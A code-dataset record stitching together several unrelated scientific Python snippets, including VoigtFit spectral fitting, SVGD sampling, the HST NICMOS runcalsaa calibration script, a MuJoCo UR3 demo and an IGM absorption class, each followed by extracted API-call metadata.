# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components('CrII', 'FeII', logN=13.6, ref_comp=1)
dataset.copy_components('MgI', 'FeII', logN=12.4, ref_comp=1)
dataset.prepare_dataset()
popt, chi2 = dataset.fit(verbose=True)
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_abundance()
#### Remove parameter links
#### The links may result in error when loadning the parameters later.
for par in popt.params.values():
par.expr = None
for par in dataset.pars.values():
par.expr = None
pickle.dump(popt.params, open('example_best_fit.pars','w'))
VoigtFit.SaveDataSet('example_fit.dataset', dataset)
|
[
"VoigtFit.DataSet",
"numpy.loadtxt",
"VoigtFit.SaveDataSet"
] |
[((424, 458), 'numpy.loadtxt', 'np.loadtxt', (['UVB_fname'], {'unpack': '(True)'}), '(UVB_fname, unpack=True)\n', (434, 458), True, 'import numpy as np\n'), ((487, 521), 'numpy.loadtxt', 'np.loadtxt', (['VIS_fname'], {'unpack': '(True)'}), '(VIS_fname, unpack=True)\n', (497, 521), True, 'import numpy as np\n'), ((533, 556), 'VoigtFit.DataSet', 'VoigtFit.DataSet', (['z_DLA'], {}), '(z_DLA)\n', (549, 556), False, 'import VoigtFit\n'), ((1251, 1296), 'VoigtFit.SaveDataSet', 'VoigtFit.SaveDataSet', (['"""test.dataset"""', 'dataset'], {}), "('test.dataset', dataset)\n", (1271, 1296), False, 'import VoigtFit\n'), ((3951, 4003), 'VoigtFit.SaveDataSet', 'VoigtFit.SaveDataSet', (['"""example_fit.dataset"""', 'dataset'], {}), "('example_fit.dataset', dataset)\n", (3971, 4003), False, 'import VoigtFit\n')]
|
from time import time
import os
import numpy as np
from scipy.stats import multivariate_normal
from experiments.lnpdfs.create_target_lnpfs import build_Goodwin_grad
from sampler.SVGD.python.svgd import SVGD as SVGD
unknown_params = [1, 2] + np.arange(4, 12).tolist()
num_dimensions = len(unknown_params)
seed=1
target_lnpdf = build_Goodwin_grad(unknown_params, seed=seed, sigma=np.sqrt(0.2),
parameters=np.array([10., 1.97, 0.46, 0.53,
0.02878028, 0.13585575, 1.57070286, 0.75737477,
0.28929913, 1.52671658, 1.26995194, 1.89562767]))
def dlnpdf(theta):
input = np.atleast_2d(theta)
dlnpdf.counter += len(input)
return target_lnpdf(input)[1]
dlnpdf.counter = 0
def sample(n_samps, n_iter, epsilon, path):
if path is not None:
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
prior = multivariate_normal(np.zeros((num_dimensions)), np.eye(num_dimensions))
x0 = prior.rvs(n_samps)
start = time()
samples = SVGD().update(x0, dlnpdf, n_iter=n_iter, stepsize=epsilon, path=path)
end = time()
np.savez(path, samples=samples, wallclocktime=end-start, nfevals=dlnpdf.counter)
print("done")
if __name__ == '__main__':
sample(100, 100, 1e-2, "/tmp/svgd_frisk_test")
|
[
"numpy.atleast_2d",
"os.makedirs",
"os.path.dirname",
"numpy.zeros",
"os.path.exists",
"time.time",
"numpy.array",
"numpy.arange",
"numpy.eye",
"numpy.savez",
"sampler.SVGD.python.svgd.SVGD",
"numpy.sqrt"
] |
[((711, 731), 'numpy.atleast_2d', 'np.atleast_2d', (['theta'], {}), '(theta)\n', (724, 731), True, 'import numpy as np\n'), ((1126, 1132), 'time.time', 'time', ([], {}), '()\n', (1130, 1132), False, 'from time import time\n'), ((1227, 1233), 'time.time', 'time', ([], {}), '()\n', (1231, 1233), False, 'from time import time\n'), ((1238, 1325), 'numpy.savez', 'np.savez', (['path'], {'samples': 'samples', 'wallclocktime': '(end - start)', 'nfevals': 'dlnpdf.counter'}), '(path, samples=samples, wallclocktime=end - start, nfevals=dlnpdf.\n counter)\n', (1246, 1325), True, 'import numpy as np\n'), ((379, 391), 'numpy.sqrt', 'np.sqrt', (['(0.2)'], {}), '(0.2)\n', (386, 391), True, 'import numpy as np\n'), ((438, 573), 'numpy.array', 'np.array', (['[10.0, 1.97, 0.46, 0.53, 0.02878028, 0.13585575, 1.57070286, 0.75737477, \n 0.28929913, 1.52671658, 1.26995194, 1.89562767]'], {}), '([10.0, 1.97, 0.46, 0.53, 0.02878028, 0.13585575, 1.57070286, \n 0.75737477, 0.28929913, 1.52671658, 1.26995194, 1.89562767])\n', (446, 573), True, 'import numpy as np\n'), ((907, 928), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (922, 928), False, 'import os\n'), ((1034, 1058), 'numpy.zeros', 'np.zeros', (['num_dimensions'], {}), '(num_dimensions)\n', (1042, 1058), True, 'import numpy as np\n'), ((1062, 1084), 'numpy.eye', 'np.eye', (['num_dimensions'], {}), '(num_dimensions)\n', (1068, 1084), True, 'import numpy as np\n'), ((242, 258), 'numpy.arange', 'np.arange', (['(4)', '(12)'], {}), '(4, 12)\n', (251, 258), True, 'import numpy as np\n'), ((944, 967), 'os.path.exists', 'os.path.exists', (['dirname'], {}), '(dirname)\n', (958, 967), False, 'import os\n'), ((981, 1001), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (992, 1001), False, 'import os\n'), ((1147, 1153), 'sampler.SVGD.python.svgd.SVGD', 'SVGD', ([], {}), '()\n', (1151, 1153), True, 'from sampler.SVGD.python.svgd import SVGD as SVGD\n')]
|
import numpy as np
import hypers as hp
class TestLearning:
def setup(self):
self.n3 = np.random.rand(10, 10, 30)
self.n4 = np.random.rand(10, 10, 10, 30)
self.n5 = np.random.rand(10, 10, 10, 2, 30)
self.h3 = hp.hparray(self.n3)
self.h4 = hp.hparray(self.n4)
self.h5 = hp.hparray(self.n5)
self.arrays = (self.h3, self.h4, self.h5)
def test_abundance(self):
for array in self.arrays:
ucls = array.abundance.ucls
nnls = array.abundance.nnls
fcls = array.abundance.fcls
for amethod in (ucls, nnls, fcls):
spec1d = np.random.rand(array.shape[-1])
_ = amethod.calculate(spec1d)
assert amethod.map.shape == array.shape[:-1] + (1,)
spec2d = np.random.rand(array.shape[-1], 3)
_ = amethod.calculate(spec2d)
assert amethod.map.shape == array.shape[:-1] + (3,)
|
[
"numpy.random.rand",
"hypers.hparray"
] |
[((100, 126), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(30)'], {}), '(10, 10, 30)\n', (114, 126), True, 'import numpy as np\n'), ((145, 175), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(10)', '(30)'], {}), '(10, 10, 10, 30)\n', (159, 175), True, 'import numpy as np\n'), ((194, 227), 'numpy.random.rand', 'np.random.rand', (['(10)', '(10)', '(10)', '(2)', '(30)'], {}), '(10, 10, 10, 2, 30)\n', (208, 227), True, 'import numpy as np\n'), ((247, 266), 'hypers.hparray', 'hp.hparray', (['self.n3'], {}), '(self.n3)\n', (257, 266), True, 'import hypers as hp\n'), ((285, 304), 'hypers.hparray', 'hp.hparray', (['self.n4'], {}), '(self.n4)\n', (295, 304), True, 'import hypers as hp\n'), ((323, 342), 'hypers.hparray', 'hp.hparray', (['self.n5'], {}), '(self.n5)\n', (333, 342), True, 'import hypers as hp\n'), ((652, 683), 'numpy.random.rand', 'np.random.rand', (['array.shape[-1]'], {}), '(array.shape[-1])\n', (666, 683), True, 'import numpy as np\n'), ((824, 858), 'numpy.random.rand', 'np.random.rand', (['array.shape[-1]', '(3)'], {}), '(array.shape[-1], 3)\n', (838, 858), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
"""
runcalsaa.py - Module to perform SAA correction in the CALNIC pipeline
(After CALNICA, before CALNICB) by running the PEDSUB, BEP, and SAACLEAN tasks.
PEDSUB is run only to improve the calculations of the SAA persistence and BEP
signature; no pedestal correction is actually applied to the final output
image.
USAGE: runcalsaa.py [-d] ipppssoot_raw.fits
Alternative USAGE: python
import runcalsaa
status=runcalsaa.run('ipppssoot_raw.fits')
RETURN VALUES:
It will return status codes to indicate completion status:
0 = successful completion with correction applied
4 = successful completion with no correction applied
1 = failed gracefully with exception
3 = aborted gracefully based on self-diagnostic
REQUIRED INPUT FILES:
Although these files are not specified on the command line, they
must be available for the script to succeed.
In the working directory:
ipppssoot_cal.fits
The association file specified in SAA_DARK
The _raw files specified in that association file
As specified in the _cal file header:
SAACNTAB
PEDSBTAB
FLATFILE
As specified in the post-SAA exposure file headers:
MASKFILE
SAADFILE
OUTPUT FILES & EFFECTS:
The ipppssoot_cal.fits file may be replaced.
The SAADONE keyword in the ipppssoot_cal.fits file is updated.
The BEPDONE keyword in the ipppssoot_cal.fits file is updated.
The ipppssoot_trl.txt file is appended to.
INTERIM FILES:
A _psb.fits file is created temporarily, but removed by the script.
A _ped2.fits file is created temporarily, but removed by the script.
@author: <NAME>, <NAME>
@version: 0.4 (3-Jul-2006)
0.5 (13-Aug-2008)
1.0 (26-Jan-2009)
1.1 (29-Jan-2009)
1.2 (25-Mar-2009)
1.3 (15-Jun-2010)
1.4.2 (5-NOv-2013) MLS: changed return codes for opus
"""
from __future__ import print_function
import os,time,sys
from pyraf import iraf
from iraf import stsdas, hst_calib, nicmos,ctools
from iraf import saaclean
from nictools import nic_rem_persist
from astropy.io import fits as pyfits
import numpy as N
__version__ = '1.4.2'
__vdate__ = '25-Nov-2013'
__trlmarker__ = '*** CALNIC RUNCALSAA Processing Version %s %s ***\n'%(__version__,__vdate__)
"""
These return codes have been changed as requested by opus so that they can detect a return
value of 1 as a real error for the shell script, see #1078
"""
_success = 0
_none = 4
_error = 1
_abort = 3
# Constants relevant to saaclean
statdict_saaclean = {'none':_none,'low only':_success,'high only':_success,
'both':_success,'n/a':_none,'aborted':_abort}
donestring = {_none:'OMITTED',_success:'PERFORMED',_abort:'SKIPPED',
_error:'SKIPPED'}
def run(rawname,debug=False):
#............................................................
# Setup
#............................................................
saadone = _none
bepdone = _none
if '_raw' not in rawname:
print("""ERROR: this script takes ipppssoot_raw.fits file as input:
you provided %s"""%rawname)
return
# Define file names
calname = rawname.replace('_raw','_cal')
pedname = rawname.replace('_raw','_ped')
pedname2 = rawname.replace('_raw','_ped2')
outname = rawname.replace('_raw','_scn_applied')
saapername = rawname.replace('_raw','_spr')
pedtrlname = rawname.replace('_raw.fits','_pedsb_trl.txt')
F_A = calname
F_B = pedname
F_C = outname
F_D = pedname2
# Establish connection to the trailer file
trlname = rawname.replace('_raw.fits','_trl.txt')
Trl = open( trlname,'a')
Trl.write(_timestamp('RUNCALSAA starting'))
Trl.write(__trlmarker__)
# Open the calfile header and determine whether the script should run
f = pyfits.open(calname)
prihdr = f[0].header
# Get some things from the calfile header
saaparname = f[0].header['saacntab']
pedparname = f[0].header['pedsbtab']
camera = f[0].header['camera']
# Trap the case where no PEDSBTAB was provided, as this reference file is
# required for running PEDSUB.
if pedparname == 'N/A':
# No PEDSUB reference file, so turn off all processing.
dosaa=False
saadone=_abort
dobep=False
bepdone=_abort
else:
if 'saacorr' in prihdr:
dosaa = (prihdr['saacorr'] == 'PERFORM')
else:
dosaa = False
saadone = _abort
if 'bepcorr' in prihdr:
dobep = (prihdr['bepcorr'] == 'PERFORM')
else:
dobep = False
bepdone = _abort
if ((dosaa or dobep) and (f[0].header['flatdone'] == 'PERFORMED') and (f[0].header['flatfile'] != 'N/A')):
pass # keep running
else:
Trl.write(_timestamp('RUNCALSAA omitted'))
Trl.close()
set_keys_final( _abort, _abort, F_A, donestring, saapername)
# No files to delete
f.close()
return _none
f.close()
try: # get pedsub pars for SAACLEAN, BEP, or both
kwpars = get_pedsub_pars( camera, pedparname, Trl, F_A, saapername, debug=debug)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final( _abort, _abort, F_A, donestring, saapername )
# no copy to final as it already is cal, no files to delete
return _abort
if (dosaa):
if (f[0].header['saadone'] == 'PERFORMED'):
saadone = _abort
F_S1 = F_A # set file that is the final for 'stage 1' to file F_A
else: # f[0].header['saadone'] != 'PERFORMED'):
try: # for do_pedsub
do_pedsub(pedparname, Trl, pedtrlname, F_A, F_B, kwpars, saapername)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final( _abort, _abort, F_A, donestring,saapername )
# no copy to final as it already is cal, no files to delete
return _abort
saadone, F_S1 = do_saaclean(F_B, F_A, F_C, trlname, saaparname, camera, saapername, Trl, debug=debug)
else: # dosaa is False
F_S1 = F_A # set file that is the final for 'stage 1' to file F_A
if (dobep):
try:
do_pedsub(pedparname, Trl, pedtrlname, F_S1, F_D, kwpars,saapername)
except Exception as e:
handle_exception(e, Trl, [], debug = debug)
set_keys_final(_abort,_abort, F_A, donestring,saapername )
# no copy to final as it already is cal, no files to delete
return _abort
bepdone, F_Final = do_bright_ep( F_D, F_S1, Trl, donestring, debug=debug )
else: # dobep is False
F_Final = F_S1
set_keys_final(saadone, bepdone, F_S1, donestring, saapername)
os.rename( F_Final, calname)
Trl.write(_timestamp('RUNCALSAA completed'))
Trl.close()
return _success
def set_keys_final(saadone, bepdone, F_Final, donestring, saapername):
""" Set values for saadone and bepdone in the final cal file
@param saadone: value of key SAADONE
@type saadone: string
@param bepdone: value of key BEPDONE
@type bepdone: string
@param F_Final: name of final cal file
@type F_Final: string
@param donestring: mapping of strings for done keys
@type donestring: dict
@param saapername: name of persistence model created by SAACLEAN
@type saapername: string
"""
fh = pyfits.open( F_Final, mode = 'update' )
fh[0].header.update('saadone',donestring[saadone])
fh[0].header.update('bepdone',donestring[bepdone])
if saapername != None:
fh[0].header.update('SAACRMAP',saapername)
fh.close()
def get_pedsub_pars( camera, pedparname, Trl, pedsub_file, saapername, debug=False ):
""" Get keyword parameter values for pedsub
@param camera: camera number
@type camera: int
@param pedparname: parameter file name
@type pedparname: string
@param Trl: trailer file name
@type Trl: string
@param pedsub_file: name of file with pedsub pars
@type pedsub_file: string
@param saapername: name of file for SAA persistence image
@type saapername: string
@return: kwpars
@rtype: dict
"""
# Get params from the pedsubtab
try:
kwpars = getkwpars(camera,iraf.osfn(pedparname))
except Exception as e:
set_keys_final(_error,_error, pedsub_file, donestring,saapername)
handle_exception(e, Trl, [], debug = debug)
return _error
return kwpars
def do_pedsub( pedparname, Trl, pedtrlname, file_1, file_2, kwpars, saapername):
""" Call pedsub
@param pedparname: parameter file name
@type pedparname: string
@param Trl: trailer file name
@type Trl: string
@param pedtrlname: pedsub's trailer file name
@type pedtrlname: string
@param file_1: name of input cal file
@type file_1: string
@param file_2: name of output ped file
@type file_2: string
@param kwpars: keyword params for pedsub
@type kwpars: dict
@param saapername: name of file for SAA persistence image
@type saapername: string
"""
pedsub_complete='=== PEDSUB finished'
# Timestamp the trailer file
Trl.write(_timestamp('PEDSUB starting with paramas from %s'%pedparname))
# Run pedsub with output directed to special file
iraf.flprcache()
iraf.pedsub.unlearn()
iraf.pedsub(input = file_1, output = file_2, Stdout = pedtrlname, **kwpars)
# Examine task output & append to trailer file
pedout = open( pedtrlname )
for line in pedout:
Trl.write( line )
pedout.close()
os.remove(pedtrlname)
if not line.startswith(pedsub_complete):
raise PedsubError
def do_saaclean( calcimage, targimage, output, trlname, saaparname, camera, saapername, Trl, debug=False):
""" Call saaclean
@param calcimage: calc file name
@type calimage: string
@param targimage: target file name
@type targimage: string
@param trlname: trailer file name
@type trlname: string
@param saaparname: file name for SAACLEAN pars
@type saaparname: string
@param camera: camera number
@type camera: int
@param saapername: file name for SAACLEAN persistence
@type saapername: string
@param Trl: trailer file
@type Trl: string
@return: saadone, stage 1 file
@rtype: int, string
"""
Trl.write(_timestamp('SAACLEAN starting from pars in %s'%saaparname))
# Get the task parameters from the saacntab
try:
kwpars = getkwpars( camera,iraf.osfn(saaparname) )
except Exception as e:
handle_exception( e, Trl, [calcimage], debug=debug )
saadone = _error
return saadone, targimage
#
# Run the saaclean task
try:
iraf.saaclean.unlearn()
iraf.saaclean(calcimage = calcimage,
targimage = targimage,
output = output,
saaperfile = saapername,
Stderr = Trl, **kwpars)
retstat = statdict_saaclean[ iraf.saaclean.applied ]
if not debug:
if retstat == _abort:
saadone = _abort
F_S1 = targimage # set file that is the final for 'stage 1' to file targimage
Trl.write(_timestamp('SAACLEAN aborted'))
if os.path.exists(output): os.remove(output)
elif retstat == _none:
saadone = _none
F_S1 = targimage # set file that is the final for 'stage 1' to file targimage
Trl.write(_timestamp('SAACLEAN omitted'))
if os.path.exists(output): os.remove(output)
else: # retstat is SUCCESS
saadone = _success
F_S1 = output # set file that is the final for 'stage 1'
Trl.write(_timestamp('SAACLEAN completed'))
fh_targ = pyfits.open(targimage, mode='update')
fh_targ[0].header.update(key = 'SAACRMAP', value = saapername )
fh_targ.close()
else:
saadone = retstat
if retstat == _abort or retstat == _none:
F_S1 = targimage
else:
F_S1 = output
os.rename( targimage,targimage.replace('_cal.','_orig_cal.'))
os.rename( output,targimage )
os.remove( calcimage) # remove ped file (calcimage) because 2nd pedsub will need to write to it
# Return end of phase 1 final file
return saadone, F_S1
except Exception as e:
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage) because 2nd pedsub will need to write to it
handle_exception(e, Trl, [calcimage, output], debug = debug)
saadone = _error
F_S1 = targimage
return saadone, targimage
def do_bright_ep( calcimage, targimage, Trl, donestring, debug=False):
""" Do bright earth persistence correction
@param calcimage: calc file name
@type calimage: string
@param targimage: target file name
@type targimage: string
@param Trl: trailer file name
@type Trl: string
@return: bepdone, final cal file
@rtype: int, string
"""
Trl.write(_timestamp('BEP starting' ))
# Run the nic_rem_persist task
try:
# When nic_rem_persist reset sys.stdout, IPython did not pick up on the
# change back when nrp.persist() completed, and shut down the entire IPython
# session when Trl.close() was called.
# We need to manage sys.stdout here to allow IPython to recognize that
# we are resetting it back before closing the Trl file.
sys.orig_stdout = sys.stdout
sys.stdout = Trl
nrp = nic_rem_persist.NicRemPersist( calcfile = calcimage, targfile = targimage, run_stdout = None) # set task's stdout to trailer file
nrp_stat = nrp.persist()
bepdone = nrp_stat
if (donestring[nrp_stat] == 'OMITTED'):
Trl.write(_timestamp('BEP aborted'))
elif (donestring[nrp_stat] == 'PERFORMED'):
Trl.write(_timestamp('BEP completed'))
else:
Trl.write(_timestamp('BEP skipped'))
# Set sys.stdout back to normal now that all Trl messages have been written out
sys.stdout = sys.orig_stdout
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage)
return bepdone, targimage
# If nic_rem_persist fails, we can't proceed. End with an error.
except Exception as e:
if os.path.exists( calcimage ):
os.remove( calcimage) # remove ped file (calcimage)
handle_exception(e, Trl, [calcimage], debug = debug)
# Reset sys.stdout back to normal...
sys.stdout = sys.orig_stdout
bepdone = _none
return bepdone, targimage
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class PedsubError(Exception):
def __str__(self):
return "PEDSUB ended with error"
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Utility functions
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def handle_exception(e,trl,files_to_delete,debug=False):
""" Print various useful information to various useful places """
print(str(e))
trl.write(_timestamp("Encountered exception"))
trl.write(str(e))
if not debug:
trl.write('\n Cleaning up interim files \n')
#Clean up files
for fname in files_to_delete:
if os.path.isfile(fname):
os.remove(fname)
trl.write(_timestamp('RUNCALSAA completed with errors'))
def getkwpars(camera,parname):
"""Extract the correct row of the parameter file based on the
value of CAMERA. Parameters are returned as a keyword:value
dictionary."""
d={}
f=pyfits.open(parname)
t=f[1].data
cols=f[1].columns
# Pick out the matching row of the "camera" column.
cams = t.field('camera')
idx = N.where(cams == camera)[0][0]
#..........................^^^^^^
# (The ugly [0][0] syntax is because numarray.where returns
# a tuple of arrays, and in this case we just want the
# actual scalar value that can be used to index the other
# columns in the table).
for k in cols:
d[k.name] = t.field(k.name)[idx]
del d['camera']
f.close()
return d
def _timestamp(_process_name):
"""Create formatted time string recognizable by OPUS."""
_prefix = time.strftime("\n%Y%j%H%M%S-I-----",time.localtime())
_lenstr = 60 - len(_process_name)
return _prefix+_process_name+(_lenstr*'-')+'\n'
def _getTime():
# Format time values for keywords IRAF-TLM, and DATE
_ltime = time.localtime(time.time())
time_str = time.strftime('%H:%M:%S (%d-%b-%Y)',_ltime)
return time_str
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Run from the shell.
if __name__ == '__main__':
# Look for debug flag
debug = " -d " in sys.argv
# Handle arguments
if len(sys.argv) > 3 or len(sys.argv) < 2:
print("syntax: runcalsaa.py [-d] inputfilename")
sys.exit(_error)
rawname = sys.argv[-1]
# Run script with error checking
try:
retstat = run(rawname,debug=debug)
except Exception as e:
print(str(e))
print("ERROR: RUNCALSAA failed on %s"%rawname)
retstat = _error
# Return status
sys.exit(retstat)
|
[
"pyraf.iraf.flprcache",
"os.remove",
"os.rename",
"nictools.nic_rem_persist.NicRemPersist",
"os.path.exists",
"time.strftime",
"pyraf.iraf.pedsub",
"pyraf.iraf.saaclean.unlearn",
"time.time",
"os.path.isfile",
"numpy.where",
"time.localtime",
"astropy.io.fits.open",
"pyraf.iraf.pedsub.unlearn",
"pyraf.iraf.osfn",
"pyraf.iraf.saaclean",
"sys.exit"
] |
[((3892, 3912), 'astropy.io.fits.open', 'pyfits.open', (['calname'], {}), '(calname)\n', (3903, 3912), True, 'from astropy.io import fits as pyfits\n'), ((6895, 6922), 'os.rename', 'os.rename', (['F_Final', 'calname'], {}), '(F_Final, calname)\n', (6904, 6922), False, 'import os, time, sys\n'), ((7553, 7588), 'astropy.io.fits.open', 'pyfits.open', (['F_Final'], {'mode': '"""update"""'}), "(F_Final, mode='update')\n", (7564, 7588), True, 'from astropy.io import fits as pyfits\n'), ((9460, 9476), 'pyraf.iraf.flprcache', 'iraf.flprcache', ([], {}), '()\n', (9474, 9476), False, 'from pyraf import iraf\n'), ((9481, 9502), 'pyraf.iraf.pedsub.unlearn', 'iraf.pedsub.unlearn', ([], {}), '()\n', (9500, 9502), False, 'from pyraf import iraf\n'), ((9507, 9576), 'pyraf.iraf.pedsub', 'iraf.pedsub', ([], {'input': 'file_1', 'output': 'file_2', 'Stdout': 'pedtrlname'}), '(input=file_1, output=file_2, Stdout=pedtrlname, **kwpars)\n', (9518, 9576), False, 'from pyraf import iraf\n'), ((9746, 9767), 'os.remove', 'os.remove', (['pedtrlname'], {}), '(pedtrlname)\n', (9755, 9767), False, 'import os, time, sys\n'), ((15999, 16019), 'astropy.io.fits.open', 'pyfits.open', (['parname'], {}), '(parname)\n', (16010, 16019), True, 'from astropy.io import fits as pyfits\n'), ((16925, 16969), 'time.strftime', 'time.strftime', (['"""%H:%M:%S (%d-%b-%Y)"""', '_ltime'], {}), "('%H:%M:%S (%d-%b-%Y)', _ltime)\n", (16938, 16969), False, 'import os, time, sys\n'), ((17587, 17604), 'sys.exit', 'sys.exit', (['retstat'], {}), '(retstat)\n', (17595, 17604), False, 'import os, time, sys\n'), ((10896, 10919), 'pyraf.iraf.saaclean.unlearn', 'iraf.saaclean.unlearn', ([], {}), '()\n', (10917, 10919), False, 'from pyraf import iraf\n'), ((10928, 11047), 'pyraf.iraf.saaclean', 'iraf.saaclean', ([], {'calcimage': 'calcimage', 'targimage': 'targimage', 'output': 'output', 'saaperfile': 'saapername', 'Stderr': 'Trl'}), '(calcimage=calcimage, targimage=targimage, output=output,\n saaperfile=saapername, Stderr=Trl, **kwpars)\n', (10941, 11047), False, 'from pyraf import iraf\n'), ((12489, 12509), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (12498, 12509), False, 'import os, time, sys\n'), ((13888, 13978), 'nictools.nic_rem_persist.NicRemPersist', 'nic_rem_persist.NicRemPersist', ([], {'calcfile': 'calcimage', 'targfile': 'targimage', 'run_stdout': 'None'}), '(calcfile=calcimage, targfile=targimage,\n run_stdout=None)\n', (13917, 13978), False, 'from nictools import nic_rem_persist\n'), ((14484, 14509), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (14498, 14509), False, 'import os, time, sys\n'), ((16687, 16703), 'time.localtime', 'time.localtime', ([], {}), '()\n', (16701, 16703), False, 'import os, time, sys\n'), ((16897, 16908), 'time.time', 'time.time', ([], {}), '()\n', (16906, 16908), False, 'import os, time, sys\n'), ((17299, 17315), 'sys.exit', 'sys.exit', (['_error'], {}), '(_error)\n', (17307, 17315), False, 'import os, time, sys\n'), ((8418, 8439), 'pyraf.iraf.osfn', 'iraf.osfn', (['pedparname'], {}), '(pedparname)\n', (8427, 8439), False, 'from pyraf import iraf\n'), ((10673, 10694), 'pyraf.iraf.osfn', 'iraf.osfn', (['saaparname'], {}), '(saaparname)\n', (10682, 10694), False, 'from pyraf import iraf\n'), ((12698, 12723), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (12712, 12723), False, 'import os, time, sys\n'), ((14525, 14545), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (14534, 14545), False, 'import os, time, sys\n'), ((14717, 14742), 'os.path.exists', 'os.path.exists', (['calcimage'], {}), '(calcimage)\n', (14731, 14742), False, 'import os, time, sys\n'), ((15686, 15707), 'os.path.isfile', 'os.path.isfile', (['fname'], {}), '(fname)\n', (15700, 15707), False, 'import os, time, sys\n'), ((16154, 16177), 'numpy.where', 'N.where', (['(cams == camera)'], {}), '(cams == camera)\n', (16161, 16177), True, 'import numpy as N\n'), ((11467, 11489), 'os.path.exists', 'os.path.exists', (['output'], {}), '(output)\n', (11481, 11489), False, 'import os, time, sys\n'), ((12450, 12478), 'os.rename', 'os.rename', (['output', 'targimage'], {}), '(output, targimage)\n', (12459, 12478), False, 'import os, time, sys\n'), ((12739, 12759), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (12748, 12759), False, 'import os, time, sys\n'), ((14758, 14778), 'os.remove', 'os.remove', (['calcimage'], {}), '(calcimage)\n', (14767, 14778), False, 'import os, time, sys\n'), ((15725, 15741), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (15734, 15741), False, 'import os, time, sys\n'), ((11491, 11508), 'os.remove', 'os.remove', (['output'], {}), '(output)\n', (11500, 11508), False, 'import os, time, sys\n'), ((11750, 11772), 'os.path.exists', 'os.path.exists', (['output'], {}), '(output)\n', (11764, 11772), False, 'import os, time, sys\n'), ((12027, 12064), 'astropy.io.fits.open', 'pyfits.open', (['targimage'], {'mode': '"""update"""'}), "(targimage, mode='update')\n", (12038, 12064), True, 'from astropy.io import fits as pyfits\n'), ((11774, 11791), 'os.remove', 'os.remove', (['output'], {}), '(output)\n', (11783, 11791), False, 'import os, time, sys\n')]
|
import gym
import numpy as np
from gym_UR3.envs.mujoco import MujocoUR3Env
import time
def main():
env = gym.make('UR3-v0')
Da = env.action_space.shape[0]
obs=env.reset()
start = time.time()
for i in range(100):
env.reset()
print('{}th episode'.format(i+1))
for j in range(100):
env.render()
# env.step(env.action_space.sample())
a = np.zeros(8)
a[:6] = 0.01*np.random.uniform(size = 6)
a[-1] = 1
a[-2] = 1
env.step(a)
end = time.time()
print('Done! {}'.format(end-start))
#action[0] : qpos[0] radian
#action[4] : qpos[4] radian
#action[5] : qpos[5] radian
#action[6] : qpos[7] radian인가?? 여튼 밑에 finger
#action[7] : qpos[11] radian인가?? 여튼 위에 finger
#action[8] : qpos[15] radian인가?? 여튼 가운데 finger
#action[9] : qpos[6] qpos[10] radian인가?? 여튼 밑, 위 finger 위아래로 벌어짐
if __name__=="__main__":
main()
|
[
"numpy.random.uniform",
"numpy.zeros",
"gym.make",
"time.time"
] |
[((115, 133), 'gym.make', 'gym.make', (['"""UR3-v0"""'], {}), "('UR3-v0')\n", (123, 133), False, 'import gym\n'), ((201, 212), 'time.time', 'time.time', ([], {}), '()\n', (210, 212), False, 'import time\n'), ((581, 592), 'time.time', 'time.time', ([], {}), '()\n', (590, 592), False, 'import time\n'), ((425, 436), 'numpy.zeros', 'np.zeros', (['(8)'], {}), '(8)\n', (433, 436), True, 'import numpy as np\n'), ((462, 487), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(6)'}), '(size=6)\n', (479, 487), True, 'import numpy as np\n')]
|
import os
import numpy as np
from . import __file__ as filepath
__all__ = ["Inoue14"]
class Inoue14(object):
def __init__(self, scale_tau=1.):
"""
IGM absorption from Inoue et al. (2014)
Parameters
----------
scale_tau : float
Parameter multiplied to the IGM :math:`\tau` values (exponential
in the linear absorption fraction).
I.e., :math:`f_\mathrm{igm} = e^{-\mathrm{scale\_tau} \tau}`.
"""
self._load_data()
self.scale_tau = scale_tau
def _load_data(self):
path = os.path.join(os.path.dirname(filepath),'data')
#print path
LAF_file = os.path.join(path, 'LAFcoeff.txt')
DLA_file = os.path.join(path, 'DLAcoeff.txt')
data = np.loadtxt(LAF_file, unpack=True)
ix, lam, ALAF1, ALAF2, ALAF3 = data
self.lam = lam[:,np.newaxis]
self.ALAF1 = ALAF1[:,np.newaxis]
self.ALAF2 = ALAF2[:,np.newaxis]
self.ALAF3 = ALAF3[:,np.newaxis]
data = np.loadtxt(DLA_file, unpack=True)
ix, lam, ADLA1, ADLA2 = data
self.ADLA1 = ADLA1[:,np.newaxis]
self.ADLA2 = ADLA2[:,np.newaxis]
return True
@property
def NA(self):
"""
Number of Lyman-series lines
"""
return self.lam.shape[0]
def tLSLAF(self, zS, lobs):
"""
Lyman series, Lyman-alpha forest
"""
